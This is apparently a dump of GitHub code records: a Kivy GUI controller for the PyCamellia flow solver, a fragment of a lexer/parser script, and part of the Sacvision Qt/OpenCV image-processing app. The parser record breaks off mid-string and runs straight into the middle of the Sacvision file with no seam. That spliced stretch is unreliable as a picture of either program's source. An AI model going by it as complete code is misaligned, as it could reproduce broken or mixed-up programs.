matplotlib.backends.backend_agg import FigureCanvasAgg\nfrom matplotlib.figure import Figure\nimport numpy as np\nfrom kivy.core.image.img_pygame import ImageLoaderPygame\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.image import Image\nfrom kivy.lang import Builder\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.button import Button\nfrom kivy.properties import *\nfrom kivy.core.image import Image as CoreImage\nfrom kivy.animation import Animation\nimport re\n\"\"\"\nController\n\nThe driver for the PyCamellia GUI. 
Main also assumes the\nresponsibility of reading and writing to the view (test.kv).\n\"\"\"\nclass Controller(object):\n\n def __init__(self):\n self.model = Model()\n \n \"\"\"\n Do this when refine is pressed.\n \"\"\"\n def pressRefine(self, rType): \n self.model.refine(rType)\n\n\n \"\"\"\n Convert a matplotlib.Figure to PNG image.:returns: PNG image bytes\n \"\"\"\n #def fig2png(self, fig):\n # data = StringIO.StringIO()\n # canvas = FigureCanvasAgg(fig)\n # canvas.print_png(data)\n # return data.getvalue()\n\n\n\n\n \"\"\"\n Do this when plot is pressed.\n \"\"\"\n def pressPlot(self, plotType, numPlots):\n \n self.model.plot(plotType, numPlots)\n \n \n \n \n \n \"\"\"\n Do this when reset is pressed.\n \"\"\"\n def pressReset(self):\n self.model.reset()\n pass\n\n \"\"\"\n Do this when solve is pressed.\n \"\"\"\n def pressSolve(self, data):\n results = self.model.solve(data)\n print(type(results))\n return results # either a form or errors\n \n \"\"\"\n Do this when load is pressed.\n \"\"\"\n def pressLoad(self, filename):\n self.model.load(filename)\n\n \"\"\"\n Do this when save is pressed.\n \"\"\"\n def pressSave(self, filename):\n self.model.save(filename)\n\n\n\n# Screen Accessors & Mutators ------------------------------------\n \n\n \n \n\n\n\n\"\"\"\nViewApp\n\nDesign elements are contained in the PyCamellia.kv file\nwhich kivy will look in when the program starts.\n\nKivy requires this class for interacting with view (PyCamellia.kv),\nalthough it is somewhat redundant to Controller.\n\"\"\"\nclass ViewApp(App):\n #self.root.status = \"running\"\n title = 'PyCamellia Incompressible Flow Solver'\n \"\"\"\n Added this build function so we can maipulate viewApp when it is created. \n We just need to specify which .kv file we are building from.\n \"\"\"\n def build(self):\n self.controller = Controller()\n self.numPlots = 0\n # Setting root as the instance variable needed to reference the GUI\n self.root = Builder.load_file('View.kv')\n return self.root\n\n \"\"\"\n Refine the mesh of the current form\n \"\"\"\n def refine(self, input):\n self.root.status = \"Refining...\"\n if(input[0] == 'h'):\n self.controller.pressRefine(0)\n else:\n self.controller.pressRefine(1)\n self.root.status = \"Refined.\"\n def plot(self, input):\n self.root.status = \"Plotting...\"\n self.numPlots += 1\n self.controller.pressPlot(input, self.numPlots)\n self.root.plot_image = '/tmp/plot'+str(self.numPlots)+'.png'\n \n self.root.status = \"Plotted.\"\n \n \"\"\"\n Clear all fields on the screen\n \"\"\"\n def reset(self):\n # So we don't write out self.root.ids each time:\n r = self.root.ids\n r.probType.clear()\n r.stateType.clear()\n r.refine.clear()\n r.refine.disabled=True\n r.plot.clear()\n r.plot.disabled=True\n r.polyOrder.clear()\n r.meshElems.clear()\n r.meshDim.clear()\n r.reynolds.clear()\n r.out1.clear()\n r.out2.clear()\n r.out3.clear()\n r.out4.clear()\n r.inf1.clear()\n r.inf1_x.clear()\n r.inf1_y.clear()\n r.inf2.clear()\n r.inf2_x.clear()\n r.inf2_y.clear()\n r.inf3.clear()\n r.inf3_x.clear()\n r.inf3_y.clear()\n r.inf4.clear()\n r.inf4_x.clear()\n r.inf4_y.clear()\n r.save.clear()\n r.save.disabled=True\n r.filename.clear()\n self.root.energyError = \"\"\n self.controller.pressReset()\n\n \"\"\"\n Grab the input from the screen, then create and solve a form\n with that input. 
Be sure along the way that all necessary\n data is present and valid.\n \"\"\"\n def solve(self):\n self.root.status = \"Solving...\"\n missingEntry = False # Set to true if an important field is left blank\n data = {}\n r = self.root.ids\n data[\"type\"] = self.root.ids.probType.text\n # Still says 'Problem Type' so nothing was selected\n if data[\"type\"][:1] == 'P': \n missingEntry = True\n self.root.ids.probType.highlight()\n elif data[\"type\"][:1] == 'S':\n data[\"stokes\"] = True\n elif data[\"type\"][:1] == 'N':\n data[\"stokes\"] = False\n if data[\"type\"][:3] == 'Nav':\n data[\"reynolds\"] = self.root.ids.reynolds.text\n # If no Reynolds number specified AND problem type is NOT Stokes\n # (data.get avoids a KeyError when no problem type was selected)\n if ((data.get(\"reynolds\", '') == '') and not(data[\"type\"][:1] == 'S')):\n missingEntry = True\n self.root.ids.reynolds.highlight()\n data[\"state\"] = self.root.ids.stateType.text\n # Still says 'State' so nothing was selected\n if data[\"state\"][:3] == 'Sta':\n missingEntry = True\n self.root.ids.stateType.highlight()\n elif data[\"state\"][:3] == 'Tra':\n data[\"transient\"] = True\n elif data[\"state\"][:3] == 'Ste':\n data[\"transient\"] = False\n data[\"polyOrder\"] = self.root.ids.polyOrder.text\n # Is empty so no value was given\n if data[\"polyOrder\"] == '':\n missingEntry = True\n self.root.ids.polyOrder.highlight()\n data[\"numElements\"] = self.root.ids.meshElems.text\n # Is empty so no value was given\n if data[\"numElements\"] == '':\n missingEntry = True\n self.root.ids.meshElems.highlight()\n data[\"meshDimensions\"] = self.root.ids.meshDim.text\n # Is empty so no value was given\n if data[\"meshDimensions\"] == '':\n missingEntry = True\n self.root.ids.meshDim.highlight()\n\n data[\"inflows\"] = []\n\n if r.inf1.text != \"\" and r.inf1_x.text != \"\" and r.inf1_y.text != \"\":\n data[\"inflows\"].append((r.inf1.text,r.inf1_x.text,r.inf1_y.text))\n elif r.inf1.text != \"\" or r.inf1_x.text != \"\" or r.inf1_y.text != \"\":\n missingEntry = True\n r.inf1.highlight()\n r.inf1_x.highlight()\n r.inf1_y.highlight()\n if r.inf2.text != \"\" and r.inf2_x.text != \"\" and r.inf2_y.text != \"\":\n data[\"inflows\"].append((r.inf2.text,r.inf2_x.text,r.inf2_y.text))\n elif r.inf2.text != \"\" or r.inf2_x.text != \"\" or r.inf2_y.text != \"\":\n missingEntry = True\n r.inf2.highlight()\n r.inf2_x.highlight()\n r.inf2_y.highlight()\n if r.inf3.text != \"\" and r.inf3_x.text != \"\" and r.inf3_y.text != \"\":\n data[\"inflows\"].append((r.inf3.text,r.inf3_x.text,r.inf3_y.text))\n elif r.inf3.text != \"\" or r.inf3_x.text != \"\" or r.inf3_y.text != \"\":\n missingEntry = True\n r.inf3.highlight()\n r.inf3_x.highlight()\n r.inf3_y.highlight()\n if r.inf4.text != \"\" and r.inf4_x.text != \"\" and r.inf4_y.text != \"\":\n data[\"inflows\"].append((r.inf4.text,r.inf4_x.text,r.inf4_y.text))\n elif r.inf4.text != \"\" or r.inf4_x.text != \"\" or r.inf4_y.text != \"\":\n missingEntry = True\n r.inf4.highlight()\n r.inf4_x.highlight()\n r.inf4_y.highlight() \n\n data[\"outflows\"] = []\n\n if r.out1.text != \"\":\n data[\"outflows\"].append(r.out1.text)\n if r.out2.text != \"\":\n data[\"outflows\"].append(r.out2.text)\n if r.out3.text != \"\":\n data[\"outflows\"].append(r.out3.text)\n if r.out4.text != \"\":\n data[\"outflows\"].append(r.out4.text)\n \n # don't solve unless we have all necessary entries\n if not(missingEntry):\n # Clear all inflows that may have been highlighted\n if r.inf1.text == \"\":\n r.inf1.clear()\n r.inf1_x.clear()\n r.inf1_y.clear()\n if r.inf2.text == \"\":\n 
r.inf2.clear()\n r.inf2_x.clear()\n r.inf2_y.clear()\n if r.inf3.text == \"\":\n r.inf3.clear()\n r.inf3_x.clear()\n r.inf3_y.clear()\n if r.inf4.text == \"\":\n r.inf4.clear()\n r.inf4_x.clear()\n r.inf4_y.clear()\n if r.out1.text == \"\":\n r.out1.clear()\n if r.out2.text == \"\":\n r.out2.clear()\n if r.out3.text == \"\":\n r.out3.clear()\n if r.out4.text == \"\":\n r.out4.clear()\n\n self.root.ids.save.disabled=False\n self.root.ids.plot.disabled=False\n self.root.ids.refine.disabled=False\n results = self.controller.pressSolve(data)\n if isinstance(results,dict): # if it's a dict of errors\n self.setErrors(results)\n else:\n print(type(results))\n mesh = results.solution().mesh()\n if(data[\"stokes\"]):\n self.root.energyError = str(results.solution().energyErrorTotal())\n self.root.degreesFreedom = str(mesh.numGlobalDofs())\n self.root.numElements = str(mesh.numActiveElements())\n else:\n self.root.energyError = str(results.solutionIncrement().energyErrorTotal())\n self.root.degreesFreedom = str(mesh.numGlobalDofs())\n self.root.numElements = str(mesh.numActiveElements())\n self.root.status = \"Solved.\"\n return\n else:\n self.root.status = \"Missing entries.\"\n\n def getFilename(self):\n filename = self.root.ids.filename.text\n if filename == '':\n self.root.ids.filename.highlight()\n return filename\n def load(self):\n filename = self.getFilename()\n if(filename == ''):\n return\n self.controller.pressLoad(filename)\n def save(self):\n filename = self.getFilename()\n if(filename == ''):\n return\n self.controller.pressSave(filename)\n\n \"\"\"\n Set the input errors on the GUI\n errors: A map from field to boolean, True if error, False if no error\n \"\"\"\n def setErrors(self, errors):\n r = self.root.ids\n if errors[\"reynolds\"]:\n r.reynolds.highlight()\n if errors[\"polyOrder\"]:\n r.polyOrder.highlight()\n if errors[\"numElements\"]:\n r.meshElems.highlight()\n if errors[\"meshDimensions\"]:\n r.meshDim.highlight()\n for i in range(0, len(errors[\"inflows\"])):\n if (i == 0) and errors[\"inflows\"][i]:\n r.inf1.highlight()\n r.inf1_x.highlight()\n r.inf1_y.highlight()\n elif (i == 1) and errors[\"inflows\"][i]:\n r.inf2.highlight()\n r.inf2_x.highlight()\n r.inf2_y.highlight()\n elif (i == 2) and errors[\"inflows\"][i]:\n r.inf3.highlight()\n r.inf3_x.highlight()\n r.inf3_y.highlight()\n elif (i == 3) and errors[\"inflows\"][i]:\n r.inf4.highlight()\n r.inf4_x.highlight()\n r.inf4_y.highlight()\n for i in range(0, len(errors[\"outflows\"])):\n if (i == 0) and errors[\"outflows\"][i]:\n r.out1.highlight()\n elif (i == 1) and errors[\"outflows\"][i]:\n r.out2.highlight()\n elif (i == 2) and errors[\"outflows\"][i]:\n r.out3.highlight()\n elif (i == 3) and errors[\"outflows\"][i]:\n r.out4.highlight()\n \n \n\"\"\"\n\"\"\"\nclass PyTextInput(TextInput):\n reset_text = StringProperty(\"\")\n def highlight(self):\n self.background_color=(1,0,0,1)\n def clear(self):\n self.background_color=(1,1,1,1)\n self.text=self.reset_text\n\n\"\"\"\n\"\"\"\nclass PyButton(Button):\n reset_text = StringProperty(\"\")\n def highlight(self):\n self.background_color=(1,0,0,1)\n def clear(self):\n self.background_color=(1,1,1,1)\n self.text=self.reset_text\n\nclass PyDropButton(PyButton):\n def clear(self):\n super(PyDropButton, self).clear()\n self.italic=True\n\nif __name__ == '__main__':\n 
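# NOTE (added): build() above loads the layout with Builder.load_file('View.kv'),\n # a relative path, so launch this script from the directory containing View.kv.\n 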
ViewApp().run()\n\n","repo_name":"laurajauch/phase3","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":12933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21037464420","text":"from lexer import Lexer\nfrom parserTB import Parser\nfrom tabulate import tabulate\n\n#scanner_text_input = \"/-This is main function \\nIre@decrease(){\\nIre@3num=5;\\nRingWhen (counter.\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import __version__ as mplver\r\nfrom matplotlib.image import imread as mplimread\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.backends.backend_qtagg import FigureCanvas\r\n\r\nimport sys\r\n\r\nfrom pathlib import Path\r\nimport inspect\r\nfrom importlib import resources as DataRes\r\n\r\nfrom threading import Thread\r\n\r\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets, QtGui\r\n\r\n\r\nclass SacWindow(QtWidgets.QMainWindow):\r\n \"\"\"\r\n Main Qt Window for Sacvision\r\n \"\"\"\r\n\r\n def __init__(self, parent=None):\r\n super(SacWindow, self).__init__(parent)\r\n self.resize(512, 512)\r\n self.move(300, 300)\r\n self.setWindowTitle('Sacvision 0.0.1')\r\n \r\n self.statusBar().showMessage('Sacvision 0.0.1. (c) Luis Díaz Saco')\r\n self.header = QtWidgets.QLabel()\r\n self.header.setAlignment(QtCore.Qt.AlignCenter)\r\n \r\n if __name__ == '__main__':\r\n local_dir = Path(inspect.getabsfile(SacWindow)).parent.resolve()\r\n logo_name = str(local_dir / 'data/logo_saconsulting.png')\r\n self.header.setPixmap(QtGui.QPixmap(logo_name))\r\n self.setWindowIcon(QtGui.QIcon(logo_name))\r\n else:\r\n res_file = DataRes.files(\"sacvision\")\r\n res_file = res_file / \"data\" / \"logo_saconsulting.png\"\r\n logo_data = res_file.read_bytes()\r\n logo_pixmap = QtGui.QPixmap()\r\n logo_pixmap.loadFromData(logo_data,'PNG')\r\n self.header.setPixmap(logo_pixmap)\r\n logo_icon = QtGui.QIcon()\r\n logo_icon.addPixmap(logo_pixmap.copy())\r\n self.setWindowIcon(logo_icon)\r\n \r\n self.pixmapit = None\r\n self.graphicsscene = QtWidgets.QGraphicsScene(0, 0, 512, 512)\r\n self.graphicsview = QtWidgets.QGraphicsView(self.graphicsscene)\r\n self.graphicsview.setMinimumSize(512, 512)\r\n self.graphicsview.setFrameStyle(0)\r\n self.pixmap = None\r\n\r\n self.histo = SacHistoWidget(Figure(figsize=(5, 3), dpi=70))\r\n self.histo.setMinimumSize(256, 100)\r\n mainlayout = QtWidgets.QGridLayout()\r\n\r\n layout = [self.header, self.histo]\r\n\r\n for i in range(len(layout)):\r\n mainlayout.addWidget(layout[i], 0, i)\r\n mainlayout.addWidget(self.graphicsview, 1, 0, 1, 2)\r\n\r\n self.centralwidget = QtWidgets.QWidget(self)\r\n self.setCentralWidget(self.centralwidget)\r\n\r\n self.mainproc = SacProcess()\r\n self.acqthread = None\r\n\r\n filemenu = {\"New\": self.getnew,\r\n \"Open\": self.openfile,\r\n \"Save\": self.savefile,\r\n \"Quit\": self.close\r\n }\r\n\r\n acqmenu = {\"Start\": self.startAcquisition,\r\n \"Stop\": self.stopAcquisition\r\n }\r\n\r\n viewmenu = {\"Input\": self.showinput,\r\n \"Output\": self.showoutput\r\n }\r\n\r\n opsmenu = {\"None\": self.filternone,\r\n \"Edges\": self.filteredges,\r\n \"Smooth\": self.filtersmooth,\r\n \"Freq\": self.filterfreq\r\n }\r\n\r\n hlpmenu = {\"About\": self.aboutmessage,\r\n \"Qt Version\": self.qtversion,\r\n \"Other libraries\": self.libraries,\r\n \"License\": self.saclicense\r\n }\r\n\r\n menu = self.menuBar()\r\n file = menu.addMenu(\"File\")\r\n acq = 
menu.addMenu(\"Acquisition\")\r\n view = menu.addMenu(\"View\")\r\n ops = menu.addMenu(\"Operations\")\r\n hlp = menu.addMenu(\"Help\")\r\n\r\n self.vwgroup = QtWidgets.QActionGroup(self)\r\n self.opsgroup = QtWidgets.QActionGroup(self)\r\n\r\n self.actions = {}\r\n\r\n for entry, function in filemenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n file.addAction(f)\r\n f.setStatusTip(\"File actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n for entry, function in acqmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n acq.addAction(f)\r\n f.setStatusTip(\"Acquisition actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n for entry, function in viewmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n self.vwgroup.addAction(f)\r\n f.setCheckable(True)\r\n view.addAction(f)\r\n f.setStatusTip(\"View images\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n self.vwgroup.setExclusive(True)\r\n\r\n for entry, function in opsmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n self.opsgroup.addAction(f)\r\n f.setCheckable(True)\r\n ops.addAction(f)\r\n f.setStatusTip(\"Operations\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n self.opsgroup.setExclusive(True)\r\n\r\n for entry, function in hlpmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n hlp.addAction(f)\r\n f.setStatusTip(\"Help actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n self.actions['Input'].setChecked(True)\r\n self.actions['None'].setChecked(True)\r\n\r\n self.actions['Stop'].setEnabled(False)\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(False)\r\n\r\n self.centralwidget.setLayout(mainlayout)\r\n self.adjustSize()\r\n\r\n def processingmenu(self):\r\n self.close()\r\n \r\n def showimage(self):\r\n if self.pixmapit is not None:\r\n self.graphicsscene.removeItem(self.pixmapit)\r\n self.pixmapit = self.graphicsscene.addPixmap(self.pixmap)\r\n sc = self.graphicsscene\r\n sc.setSceneRect(0, 0, self.pixmap.width(),\r\n self.pixmap.height())\r\n self.graphicsview.setFixedSize(self.pixmap.width(),\r\n self.pixmap.height())\r\n sc.update(sc.sceneRect())\r\n self.adjustSize()\r\n\r\n def showhistogram(self):\r\n if self.mainproc.histim is None:\r\n self.mainproc.gethist(self.inp)\r\n self.histo.putdata(self.mainproc.histim)\r\n self.histo.plot()\r\n \r\n def getnew(self):\r\n self.mainproc.getnew()\r\n self.showinput()\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(True)\r\n\r\n def openfile(self):\r\n fname, ftype = QtWidgets.QFileDialog.getOpenFileName(\r\n self, 'Open file', '.', \"Image files (*.jpg *.gif)\")\r\n if len(fname) > 0:\r\n self.mainproc.setparam(fname)\r\n self.mainproc.getinput()\r\n self.showinput()\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(True)\r\n if self.mainproc.filter == 'None':\r\n self.actions['Output'].setEnabled(False)\r\n else:\r\n self.actions['Output'].setEnabled(True)\r\n self.update()\r\n\r\n def savefile(self):\r\n fname, ftype = QtWidgets.QFileDialog.getSaveFileName(\r\n self, 'Save file', '.', \"Image files (*.jpg *.gif)\")\r\n if len(fname) > 0:\r\n self.mainproc.saveoutput(fname)\r\n\r\n def startAcquisition(self):\r\n self.actions['Start'].setEnabled(False)\r\n self.actions['Stop'].setEnabled(True)\r\n self.vwgroup.setEnabled(False)\r\n self.opsgroup.setEnabled(False)\r\n self.statusBar().showMessage('Acquiring image from camera')\r\n \r\n if self.mainproc.filter is None:\r\n 
self.mainproc.filter = 'None'\r\n self.acqthread = SacFilterAcquisition(self)\r\n self.acqthread.start()\r\n\r\n def stopAcquisition(self):\r\n if self.acqthread is not None and self.acqthread.is_alive():\r\n self.mainproc.inp = self.acqthread.stopAcquisition()\r\n self.showinput()\r\n self.actions['Stop'].setEnabled(False)\r\n self.actions['Start'].setEnabled(True)\r\n self.vwgroup.setEnabled(True)\r\n if self.mainproc.filter == 'None':\r\n self.actions['Output'].setEnabled(False)\r\n else:\r\n self.actions['Output'].setEnabled(True)\r\n self.opsgroup.setEnabled(True)\r\n self.statusBar().showMessage('End of acquisition')\r\n\r\n def showinput(self):\r\n self.pixmap = self.mainproc.showinput()\r\n self.mainproc.gethist(self.mainproc.inp)\r\n self.showhistogram()\r\n self.showimage()\r\n self.update()\r\n self.actions['Input'].setChecked(True)\r\n self.statusBar().showMessage('Input Image')\r\n\r\n def showoutput(self):\r\n self.pixmap = self.mainproc.showoutput()\r\n self.mainproc.gethist(self.mainproc.outp)\r\n self.showhistogram()\r\n self.showimage()\r\n if self.mainproc.outp is not None:\r\n self.update()\r\n self.actions['Output'].setChecked(True)\r\n self.actions['Save'].setEnabled(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filternone(self):\r\n self.mainproc.filternone()\r\n if self.mainproc.inp is not None:\r\n self.showinput()\r\n self.actions['Output'].setEnabled(False)\r\n self.actions['Save'].setEnabled(False)\r\n self.actions['Input'].setChecked(True)\r\n self.statusBar().showMessage('Input Image')\r\n\r\n def filteredges(self):\r\n self.mainproc.filteredges()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filtersmooth(self):\r\n self.mainproc.filtersmooth()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filterfreq(self):\r\n self.mainproc.filterfreq()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def aboutmessage(self):\r\n QtWidgets.QMessageBox.about(self, \"About\", \"Sacvision 0.0.1\\n\\n\"\r\n \"(c) 2017-2022 Luis Díaz Saco\\n\\n\"\r\n \"Distributed under GNU AGPLv3 License\")\r\n\r\n def qtversion(self):\r\n QtWidgets.QMessageBox.aboutQt(self, \"Qt Version\")\r\n\r\n def libraries(self):\r\n mplstr = 'Matplotlib version ' + mplver + '\\n\\n'\r\n ocvstr = 'Opencv version ' + cv2.__version__ + '\\n\\n'\r\n npstr = 'Numpy version ' + np.__version__\r\n QtWidgets.QMessageBox.information(self, \"Using libraries\",\r\n mplstr + ocvstr + npstr)\r\n\r\n def saclicense(self):\r\n QtWidgets.QMessageBox.information(self, \"License\",\r\n \"This program is free software: you can redistribute it and/or \"\r\n \"modify it under the terms of the GNU Affero General Public \"\r\n \"License as published by the Free Software Foundation, either \"\r\n \"version 3 of the License, or any later version.\\n\\n\"\r\n \"This program is distributed in the hope that it will be useful,\"\r\n \" but WITHOUT ANY WARRANTY; without even the implied warranty of\"\r\n \" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\"\r\n \" GNU Affero General Public License for more details.\\n\\n\"\r\n \"You should have received a copy of the GNU Affero General Public \"\r\n \"License along with this program. If not, see \"\r\n \".\\n\\n\"\r\n \"Contact the author at saconsultingacs@outlook.com\")\r\n\r\n def closeEvent(self, event):\r\n self.mainproc.close()\r\n\r\n def paintEvent(self, event):\r\n if self.pixmap is not None:\r\n self.showimage()\r\n super(SacWindow, self).paintEvent(event)\r\n\r\n\r\nclass SacThreadOperation(Thread):\r\n \"\"\"\r\n Base class for different operations with images\r\n \"\"\"\r\n\r\n def __init__(self, window=None):\r\n Thread.__init__(self)\r\n self.image = None\r\n self.isRunning = False\r\n self.window = window\r\n\r\n def mainloop(self):\r\n if self.initcamera():\r\n self.initscreen()\r\n self.isRunning = True\r\n while (self.isRunning):\r\n if self.acquireimage():\r\n self.mainoperation()\r\n self.closecamera()\r\n self.closescreen()\r\n\r\n def initcamera(self):\r\n self.cap = cv2.VideoCapture(0)\r\n if self.cap.isOpened():\r\n return True\r\n else:\r\n print(\"I cannot open camera\")\r\n self.cap.release()\r\n return False\r\n\r\n def initscreen(self):\r\n pass\r\n\r\n def acquireimage(self):\r\n ret, self.image = self.cap.read()\r\n return ret\r\n\r\n def closecamera(self):\r\n self.cap.release()\r\n\r\n def closescreen(self):\r\n pass\r\n\r\n def mainoperation(self):\r\n pass\r\n\r\n def stopAcquisition(self):\r\n self.isRunning = False\r\n return self.image\r\n\r\n def run(self):\r\n self.mainloop()\r\n\r\n\r\nclass SacAcquisitioncv(SacThreadOperation):\r\n \"\"\"\r\n Initial class to acquire images using the OpenCV interface.\r\n It is not used with the Qt interface\r\n \"\"\"\r\n\r\n def __init(self, window=None):\r\n SacThreadOperation.__init__(self, window)\r\n self.windowName = 'Saconsulting Acquisition'\r\n\r\n def closescreen(self):\r\n cv2.destroyWindow(self.windowName)\r\n\r\n def mainoperation(self):\r\n cv2.imshow(self.windowName, self.image)\r\n\r\n\r\nclass SacAcquisition(SacThreadOperation):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Show the source image from the camera.\r\n \"\"\"\r\n\r\n def __init__(self, window=None):\r\n SacThreadOperation.__init__(self, window)\r\n\r\n def initscreen(self):\r\n width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.window.graphicsscene.setSceneRect(0, 0, width, height)\r\n self.window.graphicsview.setFixedSize(width, height)\r\n self.window.update()\r\n self.window.adjustSize()\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(self.image)\r\n self.window.mainproc.gethist(self.image)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacEdgesAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows an edge detection operator of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.doprocessedges(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacSmoothAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows the smoothed image of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not 
None:\r\n im = self.window.mainproc.doprocesssmooth(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\nclass SacFreqAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows the frequency spectrum of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.doprocessfrequency(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n \r\nclass SacFilterAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire image through the Qt interface.\r\n Shows a filtered image of the source image from the camera\r\n \"\"\"\r\n \r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.applyfilter(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacHistoWidget(FigureCanvas):\r\n \"\"\"\r\n Draw a histogram from a set of data\r\n \"\"\"\r\n\r\n def __init__(self, fig):\r\n super().__init__(fig)\r\n self.data = np.zeros(256)\r\n self.ax = self.figure.subplots()\r\n self.ax.plot(self.data)\r\n\r\n def putdata(self, data):\r\n self.data = data\r\n\r\n def plot(self):\r\n if self.data is not None:\r\n self.ax.clear()\r\n self.ax.plot(self.data)\r\n self.figure.canvas.draw()\r\n\r\n\r\nclass SacProcess():\r\n \"\"\"\r\n Define methods for image processing with OpenCV\r\n \"\"\"\r\n\r\n def __init__(self, param=None):\r\n self.inp = None\r\n self.outp = None\r\n self.histim = None\r\n self.filter = 'None'\r\n local_dir = Path(inspect.getabsfile(SacWindow)).parent.resolve()\r\n self.default_img = str(local_dir / 'data/lena.jpg')\r\n if param is None:\r\n self.param = self.default_img\r\n else:\r\n self.param = param\r\n\r\n def main(self):\r\n self.filteredges()\r\n\r\n def filternone(self):\r\n self.filter = 'None'\r\n if self.inp is not None:\r\n self.showinput()\r\n\r\n def filteredges(self):\r\n self.filter = 'Edges'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def filtersmooth(self):\r\n self.filter = 'Smooth'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def filterfreq(self):\r\n self.filter = 'Freq'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def setparam(self, param=None):\r\n self.param = param\r\n\r\n def getnew(self):\r\n if __name__ == '__main__':\r\n self.inp = cv2.imread(self.default_img, cv2.IMREAD_COLOR)\r\n print('New input image set to the default image')\r\n else:\r\n res_file = DataRes.files(\"sacvision\")\r\n res_file = res_file / \"data\" / \"lena.jpg\"\r\n with DataRes.as_file(res_file) as data:\r\n inp_im = mplimread(data,'JPG')\r\n self.inp = cv2.cvtColor(inp_im,cv2.COLOR_RGB2BGR)\r\n\r\n def getinput(self):\r\n self.inp = cv2.imread(self.param, cv2.IMREAD_COLOR)\r\n print('Reading image', self.param)\r\n\r\n def saveoutput(self, name):\r\n if self.outp is not None:\r\n print('Writing image', name)\r\n cv2.imwrite(name, self.outp)\r\n\r\n def gethist(self, im):\r\n imggray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\r\n self.histim = cv2.calcHist([imggray], [0], None, [256], [0, 256])\r\n\r\n def doprocessnone(self, img):\r\n return img\r\n\r\n def doprocessedges(self, img):\r\n imggray = cv2.cvtColor(img, 
